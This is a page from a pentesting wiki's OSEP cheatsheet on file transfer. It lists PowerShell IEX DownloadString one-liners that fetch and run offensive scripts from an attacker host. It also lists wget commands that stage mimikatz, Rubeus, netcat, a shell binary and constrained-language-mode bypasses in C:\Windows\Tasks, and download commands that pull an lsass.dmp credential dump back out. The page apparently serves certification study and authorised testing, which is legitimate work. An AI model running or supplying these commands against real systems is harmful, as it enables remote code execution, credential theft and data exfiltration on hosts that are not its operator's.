Awesome Hackpuntes
  • Intro
  • My CVE
  • Exploit-DB
    • XMLBlueprint <= 16.191112 - XML External Entity Injection
    • Easy XML Editor <= 1.7.8 - XML External Entity Injection
    • winrar 5.80 64bit - Denial of Service
    • rConfig 3.9.2 - Remote Code Execution
    • XML Notepad 2.8.0.4 - XML External Entity Injection
    • IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path
  • OWASP - EN
    • OWASP: Testing guide checklist
  • OWASP - ES
    • [INFO] RECOPILACIÓN DE INFORMACIÓN
    • [CONFIG] GESTIÓN DE CONFIGURACIÓN E IMPLEMENTACIÓN
    • OWASP: Guía de pruebas
  • Page 1
  • 🕵️OSEP Cheatsheet
    • Checklist
    • Online Tools
    • AV Evasion
    • File transfer
    • Exfiltrate Data
    • Interesting files
    • Network Forwarding
    • Tools
    • CRTO Cheat Sheet
    • Page
    • Page 3
    • Page 4
  • 📱Mobile Pentesting
  • 🤖Android
    • Page 2
  • 💸iOS
    • How to extract IPA from iOS device
Powered by GitBook
On this page
  • Imports
  • wget
  • Uploads
  • Downloads

Was this helpful?

  1. OSEP Cheatsheet

File transfer

Imports

IEX

IEX (New-Object Net.WebClient).DownloadString('http://<attacker-ip>/Powermad.ps1')
IEX (New-Object Net.WebClient).DownloadString('http://<attacker-ip>/PowerUpSQL.ps1')
IEX (New-Object Net.WebClient).DownloadString('http://<attacker-ip>/PowerView.ps1')
IEX (New-Object Net.WebClient).DownloadString('http://<attacker-ip>/SharpHound.ps1')
powershell (new-object system.net.webclient).downloadstring('http://<attacker-ip>/HostRecon.ps1') | IEX

Import-Module

cd c:\windows\tasks
. .\PowerView.ps1

wget

wget http://<attacker-ip>/CLMBypass.exe -OutFile C:\Windows\Tasks\CLMBypass.exe
wget http://<attacker-ip>/mimikatz.exe -OutFile C:\Windows\Tasks\mimikatz.exe
wget http://<attacker-ip>/mimidrv.sys -OutFile C:\Windows\Tasks\mimidrv.sys
wget http://<attacker-ip>/linpeas.sh -O /tmp/linpeas.sh
wget http://<attacker-ip>/Powermad.ps1 -OutFile C:\Windows\Tasks\Powermad.ps1
wget http://<attacker-ip>/PowerView.ps1 -OutFile C:\Windows\Tasks\PowerView.ps1
wget http://<attacker-ip>/PsExec.exe -OutFile C:\Windows\Tasks\PsExec.exe
wget http://<attacker-ip>/Rubeus.exe -OutFile C:\Windows\Tasks\Rubeus.exe
wget http://<attacker-ip>/Seatbelt.exe -OutFile C:\Windows\Tasks\Seatbelt.exe 
wget http://<attacker-ip>/SharpHound.exe -OutFile C:\Windows\Tasks\SharpHound.exe
wget http://<attacker-ip>/shell.exe -OutFile C:\Windows\Tasks\shell.exe
wget http://<attacker-ip>/SpoolSample.exe -OutFile C:\Windows\Tasks\SpoolSample.exe
wget http://<attacker-ip>/netcat.bat -OutFile C:\Windows\Tasks\netcat.bat
wget http://<attacker-ip>/nc.exe -OutFile C:\Windows\Tasks\nc.exe

Uploads

upload /var/www/html/bypass-clm.exe c:\\windows\\tasks
upload /var/www/html/CLMBypass.exe c:\\windows\\tasks
upload /var/www/html/CustomRunspace.exe c:\\windows\\tasks
upload /var/www/html/HostRecon.ps1 c:\\windows\\tasks
upload /var/www/html/LAPSToolkit.ps1 c:\\windows\\tasks
upload /var/www/html/mimikatz.exe c:\\windows\\tasks
upload /var/www/html/PowerView.ps1 c:\\windows\\tasks
upload /var/www/html/PrintSpooferNetNI.exe c:\\windows\\tasks
upload /var/www/html/PrivescCheck.ps1 c:\\windows\\tasks
upload /var/www/html/Rubeus.exe c:\\windows\\tasks
upload /var/www/html/SharpHound.exe c:\\windows\\tasks
upload /var/www/html/SharpHound.ps1 c:\\windows\\tasks
upload /var/www/html/SpoolSample.exe c:\\windows\\tasks
upload /var/www/html/XORCrypter.exe c:\\windows\\tasks
upload /var/www/html/XORCrypter.exe c:\\inetpub\\wwwroot

Downloads

download c:\\windows\\tasks\\bloodhound.zip
download C:\\windows\\tasks\\HostRecon.txt
download C:\\windows\\tasks\\lsass.dmp /var/www/html/lsass.dmp
download c:\\windows\\tasks\\PrivescCheck.html
download c:\\windows\\tasks\\test.txt
PreviousAV EvasionNextExfiltrate Data

Last updated 2 years ago

Was this helpful?

🕵️